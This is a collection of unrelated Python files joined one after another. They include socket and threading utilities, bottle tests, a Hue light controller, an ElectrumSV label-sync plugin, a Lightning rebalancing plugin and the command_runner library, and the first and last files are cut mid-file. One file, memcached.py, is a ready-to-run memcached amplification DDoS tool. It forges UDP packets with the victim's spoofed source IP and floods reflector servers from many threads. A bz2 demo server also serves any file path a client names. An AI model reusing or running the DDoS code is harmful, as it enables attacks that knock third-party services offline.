rcvd.append(msg)
# do something more useful
sockio = ThreadedSocketIOClient(server, port)
# first message
socketio('5:::{"foo":"bar"}', myfunc)
# second message
socketio('5:::{"bar":"baz"}', myfunc)
# wait for callbacks
while len(rcvd) < 2:
time.sleep(1)
# shutdown
sockio.close()
"""
def __init__(self, server, port, protocol="ws", *args, **kwargs):
self._q = Queue()
self.msg = None
self._callback = None
self._t = None
super(ThreadedSocketIOClient, self
).__init__(server, port, protocol, *args, **kwargs)
def __call__(self, msg, callback):
logger.debug("%s.__call__::%s, %s",
self.__class__.__name__, msg, callback)
self._q.put((msg, callback))
if self._t is None:
self.runloop()
def callback(self, msg):
logger.debug("%s.callback::calling %s with msg=%s",
self.__class__.__name__, self._callback, msg)
if self._callback is not None:
self._callback(msg)
# re-loop
self.runloop()
else:
raise AttributeError("No callback to handle message::%s" % msg)
def runloop(self):
logger.debug("%s.runloop",
self.__class__.__name__)
# blocks until next message or terminator
self.msg, self._callback = self._q.get()
logger.debug("%s.runloop::callback set to %s",
self.__class__.__name__, self._callback)
# initial loop
if self._t is None:
self._t = threading.Thread(target=self._run)
self._t.start()
# terminator
elif self.msg is None:
self._close()
else:
self.send_message(self.msg)
def _run(self):
self.on("connect", self.my_connect)
self.on("message", self.my_message)
self.on("disconnect", self.my_disconnect)
self.on("error", self.my_error)
self.on("timeout", self.my_timeout)
# fixes connection reset by peer errors
time.sleep(0.001)
self.run()
def my_error(self, error):
self.my_disconnect('dikke error %s ik kap ermee ait' % error)
def my_timeout(self):
self.my_disconnect('timeout yo, ik kap ermee')
def my_connect(self):
self.send_message(self.msg)
def send_message(self, msg):
logger.debug("%s.send_message::%s",
self.__class__.__name__, msg)
self.send(msg)
def my_message(self, msg):
logger.debug("%s.my_message::> %s",
self.__class__.__name__, msg)
message = msg.split(':')
if message[0] == "5":
my_msg = json.loads(':'.join(message[3:]))
self.callback(my_msg)
def my_disconnect(self, msg=None):
self.close()
def close(self):
logger.debug("%s.close",
self.__class__.__name__)
self._q.put((None, None))
def _close(self):
self.sock.settimeout(1)
self.sock.shutdown(socket.SHUT_RDWR)
# no sys.exit!
def on_server(data):
pass
def onclose(self):
logger.debug("%s.onclose" %
(self.__class__.__name__))
super(ThreadedSocketIOClient, self).onclose()
|
test_contextlocals.py
|
# -*- coding: utf-8 -*-
'''
Some objects are context-local, meaning that they have different values depending on the context they are accessed from. A context is currently defined as a thread.
'''
import unittest
import bottle
import threading
def run_thread(func):
t = threading.Thread(target=func)
t.start()
t.join()
class TestThreadLocals(unittest.TestCase):
def test_request(self):
e1 = {'PATH_INFO': '/t1'}
e2 = {'PATH_INFO': '/t2'}
def run():
bottle.request.bind(e2)
self.assertEqual(bottle.request.path, '/t2')
bottle.request.bind(e1)
self.assertEqual(bottle.request.path, '/t1')
run_thread(run)
self.assertEqual(bottle.request.path, '/t1')
def test_response(self):
def run():
bottle.response.bind()
bottle.response.content_type='test/thread'
self.assertEqual(bottle.response.headers['Content-Type'], 'test/thread')
bottle.response.bind()
bottle.response.content_type='test/main'
self.assertEqual(bottle.response.headers['Content-Type'], 'test/main')
run_thread(run)
self.assertEqual(bottle.response.headers['Content-Type'], 'test/main')
if __name__ == '__main__': #pragma: no cover
unittest.main()
|
hue.py
|
from phue import Bridge
import threading
import random
import time
class HueController:
def __init__(self):
self.bridge = Bridge('192.168.1.107') # Enter bridge IP here.
#If running for the first time, press button on bridge and run with b.connect() uncommented
#bridge.connect()
self.lights = self.bridge.get_light_objects()
for light in self.lights:
print(light.brightness)
print(light.xy)
self.state = 'off'
self.on_off_toggle = False
def set_off(self):
try:
self.stop_blink()
self.bridge.set_group(1, 'on', False)
self.state = 'off'
except:
pass
def set_on(self):
try:
self.stop_blink()
self.bridge.set_group(1, 'on', True)
self.bridge.set_group(1, 'xy', [0.4578, 0.41])
self.bridge.set_group(1, 'brightness', 254)
self.state = 'photo'
except:
pass
def start_blink(self):
try:
self.keep_blinking = True
self.blink_thread = threading.Thread(target=self._blink).start()
except:
pass
def stop_blink(self):
self.keep_blinking = False
def _blink(self):
try:
while(self.keep_blinking):
for light in self.lights:
if self.on_off_toggle:
light.transitiontime = 0
light.on = True
light.xy = [random.random(),random.random()]
else:
light.transitiontime = 0
light.on = False
time.sleep(0.05)
self.on_off_toggle = not self.on_off_toggle
if not self.keep_blinking:
break
except:
pass
class HueStubController:
def __init__(self):
print('hue - init')
def set_off(self):
print('hue - set off')
def set_on(self):
print('hue - set on')
def start_blink(self):
print('hue - start blink')
def stop_blink(self):
print('hue - stop blink')
|
labels.py
|
import base64
import json
import hashlib
import logging
import requests
import threading
from electrumsv.bitcoin import aes_decrypt_with_iv, aes_encrypt_with_iv
from electrumsv.plugin import BasePlugin, hook
logger = logging.getLogger("plugin.labels")
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.bauerj.eu'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = aes_encrypt_with_iv(password, iv, msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
logger.debug("set %s nonce to %s", wallet.basename(), nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
logger.error('cannot encode %r %r', key, value)
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
logger.debug("asking for labels since nonce %s", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
logger.debug('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
logger.error('no json %s', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
logger.debug("received %d labels", len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
logging.exception("could not retrieve labels")
def on_pulled(self, _wallet):
raise NotImplementedError()
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
logger.debug("wallet %s nonce is %s", wallet.basename(), nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
test_game_threading.py
|
from __future__ import unicode_literals, print_function
import threading
from netrps.game import play_second, play_first
def test_game(turn, reset_beacon):
results = []
def wrapped_play(n, my_move_char):
if n == 1:
result = play_first(my_move_char)
else:
result = play_second(my_move_char)
results.append(result)
t1 = threading.Thread(target=wrapped_play, args=(1, turn.p1_mv))
t2 = threading.Thread(target=wrapped_play, args=(2, turn.p2_mv))
t1.start()
t2.start()
t1.join()
t2.join()
assert results[0] == turn.expected_res
assert results[1] == turn.expected_res
|
bz2_server.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import bz2
import logging
import socketserver
import binascii
BLOCK_SIZE = 32
class Bz2RequestHandler(socketserver.BaseRequestHandler):
logger = logging.getLogger('Server')
def handle(self):
compressor = bz2.BZ2Compressor()
# Find out what file the client wants
filename = self.request.recv(1024).decode('utf-8')
self.logger.debug('client asked for: "%s"', filename)
# Send chunks of the file as they are compressed
with open(filename, 'rb') as input:
while True:
block = input.read(BLOCK_SIZE)
if not block:
break
self.logger.debug('RAW %r', block)
compressed = compressor.compress(block)
if compressed:
self.logger.debug(
'SENDING %r',
binascii.hexlify(compressed))
self.request.send(compressed)
else:
self.logger.debug('BUFFERING')
# Send any data being buffered by the compressor
remaining = compressor.flush()
while remaining:
to_send = remaining[:BLOCK_SIZE]
remaining = remaining[BLOCK_SIZE:]
self.logger.debug('FLUSHING %r',
binascii.hexlify(to_send))
self.request.send(to_send)
return
if __name__ == '__main__':
import socket
import sys
from io import StringIO
import threading
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
# Set up a server, running in a separate thread
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, Bz2RequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
logger = logging.getLogger('Client')
# Connect to the server
logger.info('Contacting server on %s:%s', ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Ask for a file
requested_file = (sys.argv[0]
if len(sys.argv) > 1
else 'lorem.txt')
logger.debug('sending filename: "%s"', requested_file)
len_sent = s.send(requested_file.encode('utf-8'))
# Receive a response
buffer = StringIO()
decompressor = bz2.BZ2Decompressor()
while True:
response = s.recv(BLOCK_SIZE)
if not response:
break
logger.debug('READ %r', binascii.hexlify(response))
# Include any unconsumed data when feeding the
# decompressor.
decompressed = decompressor.decompress(response)
if decompressed:
logger.debug('DECOMPRESSED %r', decompressed)
buffer.write(decompressed.decode('utf-8'))
else:
logger.debug('BUFFERING')
full_response = buffer.getvalue()
lorem = open(requested_file, 'rt').read()
logger.debug('response matches file contents: %s',
full_response == lorem)
# Clean up
server.shutdown()
server.socket.close()
s.close()
|
memcached.py
|
#!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, UDP, send, Raw
from threading import Thread
def MEMCACHED_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting MEMCACHED attack...")
# Payload
payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
threads_list = []
# Load MEMCACHED servers list
with open("tools/other/memcached_servers.txt", 'r') as f:
memcached_servers = f.readlines()
# MEMCACHED flood
def memcached_flood():
global FINISH
while not FINISH:
for server in memcached_servers:
if not FINISH:
packets = random.randint(10, 150)
server = server.replace("\n", "")
# Packet
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = target_port, dport = 11211) / Raw(load = payload)
send(packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " forged UDP packets to " + server + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = memcached_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
jitrebalance.py
|
#!/usr/bin/env python3
from math import ceil
from pyln.client import Plugin, Millisatoshi, RpcError
import binascii
import hashlib
import secrets
import threading
import time
plugin = Plugin()
def get_reverse_chan(scid, chan):
for c in plugin.rpc.listchannels(scid)['channels']:
if c['channel_flags'] != chan['direction']:
return c
return None
def get_circular_route(scid, chan, amt, peer, exclusions, request):
"""Compute a circular route with `scid` as last leg.
"""
# Compute the last leg of the route first, so we know the parameters to
# traverse that last edge.
reverse_chan = get_reverse_chan(scid, chan)
if reverse_chan is None:
plugin.log("Could not compute parameters for the last hop")
return None
last_amt = ceil(float(amt) +
float(amt) * reverse_chan['fee_per_millionth'] / 10**6 +
reverse_chan['base_fee_millisatoshi'])
last_cltv = 9 + reverse_chan['delay']
try:
route = plugin.rpc.getroute(
node_id=peer['id'],
msatoshi=last_amt,
riskfactor=1,
exclude=exclusions,
cltv=last_cltv,
)['route']
# Append the last hop we computed manually above
route += [{
'id': plugin.node_id,
'channel': scid,
'direction': chan['direction'],
'msatoshi': amt,
'amount_msat': '{}msat'.format(amt),
'delay': 9
}]
return route
except RpcError:
plugin.log("Could not get a route, no remaining one? Exclusions : {}"
.format(exclusions))
return None
def try_rebalance(scid, chan, amt, peer, request):
# Exclude the channel we are trying to rebalance when searching for a
# path. We will manually append it to the route and bump the other
# parameters so it can be used afterwards
exclusions = [
"{scid}/{direction}".format(scid=scid, direction=chan['direction'])
]
# Try as many routes as possible before the timeout expires
stop_time = int(time.time()) + plugin.rebalance_timeout
while int(time.time()) <= stop_time:
route = get_circular_route(scid, chan, amt, peer, exclusions, request)
# We exhausted all the possibilities, Game Over
if route is None:
request.set_result({"result": "continue"})
return
# We're about to initiate a rebalancing, we'd better remember how we can
# settle it once we see it back here.
payment_key = secrets.token_bytes(32)
payment_hash = hashlib.sha256(payment_key).hexdigest()
plugin.rebalances[payment_hash] = {
"payment_key": binascii.hexlify(payment_key).decode('ASCII'),
"payment_hash": payment_hash,
"request": request,
}
# After all this work we're finally in a position to judge whether a
# rebalancing is worth it at all. The rebalancing is considered worth it
# if the fees we're about to pay are less than or equal to the fees we get
# out of forwarding the payment.
plugin.log("Sending rebalance request using payment_hash={}, route={}".format(
payment_hash, route
))
try:
plugin.rpc.sendpay(route, payment_hash)
# If the attempt is successful, we acknowledged it on the
# receiving end (a couple of line above), so we leave it dangling
# here.
if (plugin.rpc.waitsendpay(payment_hash).get("status")
== "complete"):
plugin.log("Succesfully re-filled outgoing capacity in {},"
"payment_hash={}".format(scid, payment_hash))
return
except RpcError as e:
error = e.error['data']
# The erring_channel field can not be present (shouldn't happen) or
# can be "0x0x0"
erring_channel = error.get('erring_channel', '0x0x0')
if erring_channel != '0x0x0':
if erring_channel == scid:
break
erring_direction = error['erring_direction']
exclusions.append("{}/{}".format(erring_channel,
erring_direction))
plugin.log("Excluding {} due to a failed attempt"
.format(erring_channel))
plugin.log("Timed out while trying to rebalance")
request.set_result({"result": "continue"})
def get_peer_and_channel(peers, scid):
"""Look for the channel identified by {scid} in our list of {peers}"""
for peer in peers:
for channel in peer["channels"]:
if channel.get("short_channel_id") == scid:
return (peer, channel)
return (None, None)
@plugin.async_hook("htlc_accepted")
def on_htlc_accepted(htlc, onion, plugin, request, **kwargs):
plugin.log("Got an incoming HTLC htlc={}".format(htlc))
# The HTLC might be a rebalance we ourselves initiated, better check
# against the list of pending ones.
rebalance = plugin.rebalances.get(htlc['payment_hash'], None)
if rebalance is not None:
# Settle the rebalance, before settling the request that initiated the
# rebalance.
request.set_result({
"result": "resolve",
"payment_key": rebalance['payment_key']
})
# Now wait for it to settle correctly
plugin.rpc.waitsendpay(htlc['payment_hash'])
rebalance['request'].set_result({"result": "continue"})
# Clean up our stash of active rebalancings.
del plugin.rebalances[htlc['payment_hash']]
return
# Check to see if the next channel has sufficient capacity
scid = onion['short_channel_id'] if 'short_channel_id' in onion else '0x0x0'
# Are we the destination? Then there's nothing to do. Continue.
if scid == '0x0x0':
request.set_result({"result": "continue"})
return
# Locate the channel + direction that would be the next in the path
peers = plugin.rpc.listpeers()['peers']
peer, chan = get_peer_and_channel(peers, scid)
if peer is None or chan is None:
return
# Check if the channel is active and routable, otherwise there's little
# point in even trying
if not peer['connected'] or chan['state'] != "CHANNELD_NORMAL":
request.set_result({"result": "continue"})
return
# Need to consider who the funder is, since they are paying the fees.
# TODO If we are the funder we need to take the cost of an HTLC into
# account as well.
#funder = chan['msatoshi_to_us_max'] == chan['msatoshi_total']
forward_amt = Millisatoshi(onion['forward_amount'])
# If we have enough capacity just let it through now. Otherwise the
# Millisatoshi raises an error for negative amounts in the calculation
# below.
if forward_amt < chan['spendable_msat']:
request.set_result({"result": "continue"})
return
# Compute the amount we need to rebalance, give us a bit of breathing room
# while we're at it (25% more rebalancing than strictly necessary) so we
# don't end up with a completely unbalanced channel right away again, and
# to account for a bit of fuzziness when it comes to dipping into the
# reserve.
amt = ceil(int(forward_amt - chan['spendable_msat']) * 1.25)
# If we have a higher balance than is required we don't need to rebalance,
# just stop here.
if amt <= 0:
request.set_result({"result": "continue"})
return
t = threading.Thread(target=try_rebalance, args=(scid, chan, amt, peer, request))
t.daemon = True
t.start()
@plugin.init()
def init(options, configuration, plugin):
plugin.log("jitrebalance.py initializing {}".format(configuration))
plugin.node_id = plugin.rpc.getinfo()['id']
# FIXME: this int() shouldn't be needed: check if this is pyln's or
# lightningd's fault.
plugin.rebalance_timeout = int(options.get("jitrebalance-try-timeout"))
# Set of currently active rebalancings, keyed by their payment_hash
plugin.rebalances = {}
plugin.add_option(
"jitrebalance-try-timeout",
60,
"Number of seconds before we stop trying to rebalance a channel.",
opt_type="int"
)
plugin.run()
|
__init__.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of command_runner module
"""
command_runner is a quick tool to launch commands from Python, get exit code
and output, and handle most errors that may happen
Versioning semantics:
Major version: backward compatibility breaking changes
Minor version: New functionality
Patch version: Backwards compatible bug fixes
"""
__intname__ = "command_runner"
__author__ = "Orsiris de Jong"
__copyright__ = "Copyright (C) 2015-2021 Orsiris de Jong"
__licence__ = "BSD 3 Clause"
__version__ = "1.3.0"
__build__ = "2021100501"
import io
import os
import shlex
import subprocess
import sys
from datetime import datetime
from logging import getLogger
from time import sleep
try:
import psutil
except ImportError:
# Don't bother with an error since we need command_runner to work without dependencies
pass
try:
import signal
except ImportError:
pass
# Python 2.7 compat fixes (queue was Queue)
try:
import queue
except ImportError:
import Queue as queue
import threading
# Python 2.7 compat fixes (missing typing and FileNotFoundError)
try:
from typing import Union, Optional, List, Tuple, NoReturn, Any
except ImportError:
pass
try:
FileNotFoundError
except NameError:
# pylint: disable=W0622 (redefined-builtin)
FileNotFoundError = IOError
try:
TimeoutExpired = subprocess.TimeoutExpired
except AttributeError:
class TimeoutExpired(BaseException):
"""
Basic redeclaration when subprocess.TimeoutExpired does not exist, python <= 3.3
"""
def __init__(self, cmd, timeout, output=None, stderr=None):
self.cmd = cmd
self.timeout = timeout
self.output = output
self.stderr = stderr
def __str__(self):
return "Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)
@property
def stdout(self):
return self.output
@stdout.setter
def stdout(self, value):
# There's no obvious reason to set this, but allow it anyway so
# .stdout is a transparent alias for .output
self.output = value
class KbdInterruptGetOutput(BaseException):
"""
Make sure we get the current output when KeyboardInterrupt is made
"""
def __init__(self, output):
self._output = output
@property
def output(self):
return self._output
logger = getLogger(__intname__)
PIPE = subprocess.PIPE
MIN_RESOLUTION = 0.05 # Minimal sleep time between polling, reduces CPU usage
def kill_childs_mod(
pid=None, # type: int
itself=False, # type: bool
soft_kill=False, # type: bool
):
# type: (...) -> bool
"""
Inline version of ofunctions.kill_childs that has no hard dependency on psutil
Kills all childs of pid (current pid can be obtained with os.getpid())
If no pid given current pid is taken
Good idea when using multiprocessing, is to call with atexit.register(ofunctions.kill_childs, os.getpid(),)
Beware: MS Windows does not maintain a process tree, so child dependencies are computed on the fly
Knowing this, orphaned processes (where parent process died) cannot be found and killed this way
Prefer using process.send_signal() in favor of process.kill() to avoid race conditions when PID was reused too fast
:param pid: Which pid tree we'll kill
:param itself: Should parent be killed too ?
"""
sig = None
### BEGIN COMMAND_RUNNER MOD
if "psutil" not in sys.modules:
logger.error(
"No psutil module present. Can only kill direct pids, not child subtree."
)
if "signal" not in sys.modules:
logger.error(
"No signal module present. Using direct psutil kill API which might have race conditions when PID is reused too fast."
)
else:
"""
Extract from Python3 doc
On Windows, signal() can only be called with SIGABRT, SIGFPE, SIGILL, SIGINT, SIGSEGV, SIGTERM, or SIGBREAK.
A ValueError will be raised in any other case. Note that not all systems define the same set of signal names;
an AttributeError will be raised if a signal name is not defined as SIG* module level constant.
"""
try:
if not soft_kill and hasattr(signal, "SIGKILL"):
# Don't bother to make pylint go crazy on Windows
# pylint: disable=E1101
sig = signal.SIGKILL
else:
sig = signal.SIGTERM
except NameError:
sig = None
### END COMMAND_RUNNER MOD
def _process_killer(
process, # type: Union[subprocess.Popen, psutil.Process]
sig, # type: signal.valid_signals
soft_kill, # type: bool
):
# (...) -> None
"""
Simple abstract process killer that works with signals in order to avoid reused PID race conditions
and can prefers using terminate than kill
"""
if sig:
try:
process.send_signal(sig)
# psutil.NoSuchProcess might not be available, let's be broad
# pylint: disable=W0703
except Exception:
pass
else:
if soft_kill:
process.terminate()
else:
process.kill()
try:
current_process = psutil.Process(pid if pid is not None else os.getpid())
# psutil.NoSuchProcess might not be available, let's be broad
# pylint: disable=W0703
except Exception:
if itself:
os.kill(
pid, 15
) # 15 being signal.SIGTERM or SIGKILL depending on the platform
return False
for child in current_process.children(recursive=True):
_process_killer(child, sig, soft_kill)
if itself:
_process_killer(current_process, sig, soft_kill)
return True
def command_runner(
command, # type: Union[str, List[str]]
valid_exit_codes=None, # type: Optional[List[int]]
timeout=3600, # type: Optional[int]
shell=False, # type: bool
encoding=None, # type: Optional[str]
stdout=None, # type: Optional[Union[int, str]]
stderr=None, # type: Optional[Union[int, str]]
windows_no_window=False, # type: bool
live_output=False, # type: bool
method="monitor", # type: str
**kwargs # type: Any
):
# type: (...) -> Tuple[Optional[int], str]
"""
Unix & Windows compatible subprocess wrapper that handles output encoding and timeouts
Newer Python check_output already handles encoding and timeouts, but this one is retro-compatible
It is still recommended to set cp437 for windows and utf-8 for unix
Also allows a list of various valid exit codes (ie no error when exit code = arbitrary int)
command should be a list of strings, eg ['ping', '127.0.0.1', '-c 2']
command can also be a single string, ex 'ping 127.0.0.1 -c 2' if shell=True or if os is Windows
Accepts all of subprocess.popen arguments
Whenever we can, we need to avoid shell=True in order to preserve better security
Avoiding shell=True involves passing absolute paths to executables since we don't have shell PATH environment
When no stdout option is given, we'll get output into the returned (exit_code, output) tuple
When stdout = filename or stderr = filename, we'll write output to the given file
live_output will poll the process for output and show it on screen (output may be non reliable, don't use it if
your program depends on the commands' stdout output)
windows_no_window will disable visible window (MS Windows platform only)
Returns a tuple (exit_code, output)
"""
# Choose default encoding when none set
# cp437 encoding assures we catch most special characters from cmd.exe
if not encoding:
encoding = "cp437" if os.name == "nt" else "utf-8"
# Fix when unix command was given as single string
# This is more secure than setting shell=True
if os.name == "posix" and shell is False and isinstance(command, str):
command = shlex.split(command)
# Set default values for kwargs
errors = kwargs.pop(
"errors", "backslashreplace"
) # Don't let encoding issues make you mad
universal_newlines = kwargs.pop("universal_newlines", False)
creationflags = kwargs.pop("creationflags", 0)
# subprocess.CREATE_NO_WINDOW was added in Python 3.7 for Windows OS only
if (
windows_no_window
and sys.version_info[0] >= 3
and sys.version_info[1] >= 7
and os.name == "nt"
):
# Disable the following pylint error since the code also runs on nt platform, but
# triggers an error on Unix
# pylint: disable=E1101
creationflags = creationflags | subprocess.CREATE_NO_WINDOW
close_fds = kwargs.pop("close_fds", "posix" in sys.builtin_module_names)
# Default buffer size. line buffer (1) is deprecated in Python 3.7+
bufsize = kwargs.pop("bufsize", 16384)
# Decide whether we write to output variable only (stdout=None), to output variable and stdout (stdout=PIPE)
# or to output variable and to file (stdout='path/to/file')
stdout_to_file = False
if stdout is None:
_stdout = PIPE
elif isinstance(stdout, str):
# We will send anything to file
_stdout = open(stdout, "wb")
stdout_to_file = True
elif stdout is False:
_stdout = subprocess.DEVNULL
else:
# We will send anything to given stdout pipe
_stdout = stdout
# The only situation where we don't add stderr to stdout is if a specific target file was given
stderr_to_file = False
if isinstance(stderr, str):
_stderr = open(stderr, "wb")
stderr_to_file = True
elif stderr is False:
_stderr = subprocess.DEVNULL
else:
_stderr = subprocess.STDOUT
def to_encoding(
process_output, # type: Union[str, bytes]
encoding, # type: str
errors, # type: str
):
# type: (...) -> str
"""
Convert bytes output to string and handles conversion errors
"""
# Compatibility for earlier Python versions where Popen has no 'encoding' nor 'errors' arguments
if isinstance(process_output, bytes):
try:
process_output = process_output.decode(encoding, errors=errors)
except TypeError:
try:
# handle TypeError: don't know how to handle UnicodeDecodeError in error callback
process_output = process_output.decode(encoding, errors="ignore")
except (ValueError, TypeError):
# What happens when str cannot be concatenated
logger.debug("Output cannot be captured {}".format(process_output))
return process_output
def _read_pipe(
stream, # type: io.StringIO
output_queue, # type: queue.Queue
):
# type: (...) -> None
"""
will read from subprocess.PIPE
Must be threaded since readline() might be blocking on Windows GUI apps
Partly based on https://stackoverflow.com/a/4896288/2635443
"""
# WARNING: Depending on the stream type (binary or text), the sentinel character
# needs to be of the same type, or the iterator won't have an end
# We also need to check that stream has readline, in case we're writing to files instead of PIPE
if hasattr(stream, "readline"):
sentinel_char = "" if hasattr(stream, "encoding") else b""
for line in iter(stream.readline, sentinel_char):
output_queue.put(line)
output_queue.put(None)
stream.close()
def _poll_process(
process, # type: Union[subprocess.Popen[str], subprocess.Popen]
timeout, # type: int
encoding, # type: str
errors, # type: str
):
# type: (...) -> Tuple[Optional[int], str]
"""
Process stdout/stderr output polling is only used in live output mode
since it takes more resources than using communicate()
Reads from process output pipe until:
- Timeout is reached, in which case we'll terminate the process
- Process ends by itself
Returns an encoded string of the pipe output
"""
begin_time = datetime.now()
output = ""
output_queue = queue.Queue()
def __check_timeout(
begin_time, # type: datetime.timestamp
timeout, # type: int
):
# type: (...) -> None
"""
Simple subfunction to check whether timeout is reached
Since we check this alot, we put it into a function
"""
if timeout and (datetime.now() - begin_time).total_seconds() > timeout:
kill_childs_mod(process.pid, itself=True, soft_kill=False)
raise TimeoutExpired(process, timeout, output)
try:
read_thread = threading.Thread(
target=_read_pipe, args=(process.stdout, output_queue)
)
read_thread.daemon = True # thread dies with the program
read_thread.start()
while True:
try:
line = output_queue.get(timeout=MIN_RESOLUTION)
except queue.Empty:
__check_timeout(begin_time, timeout)
else:
if line is None:
break
else:
line = to_encoding(line, encoding, errors)
if live_output:
sys.stdout.write(line)
output += line
__check_timeout(begin_time, timeout)
# Make sure we wait for the process to terminate, even after
# output_queue has finished sending data, so we catch the exit code
while process.poll() is None:
__check_timeout(begin_time, timeout)
# Additional timeout check to make sure we don't return an exit code from processes
# that were killed because of timeout
__check_timeout(begin_time, timeout)
exit_code = process.poll()
return exit_code, output
except KeyboardInterrupt:
raise KbdInterruptGetOutput(output)
def _timeout_check_thread(
process, # type: Union[subprocess.Popen[str], subprocess.Popen]
timeout, # type: int
timeout_queue, # type: queue.Queue
):
# type: (...) -> None
"""
Since elder python versions don't have timeout, we need to manually check the timeout for a process
"""
begin_time = datetime.now()
while True:
if timeout and (datetime.now() - begin_time).total_seconds() > timeout:
kill_childs_mod(process.pid, itself=True, soft_kill=False)
timeout_queue.put(True)
break
if process.poll() is not None:
break
sleep(MIN_RESOLUTION)
def _monitor_process(
process, # type: Union[subprocess.Popen[str], subprocess.Popen]
timeout, # type: int
encoding, # type: str
errors, # type: str
):
# type: (...) -> Tuple[Optional[int], str]
"""
Create a thread in order to enforce timeout
Get stdout output and return it
"""
# Shared mutable objects have proven to have race conditions with PyPy 3.7 (mutable object
# is changed in thread, but outer monitor function has still old mutable object state)
# Strangely, this happened only sometimes on github actions/ubuntu 20.04.3 & pypy 3.7
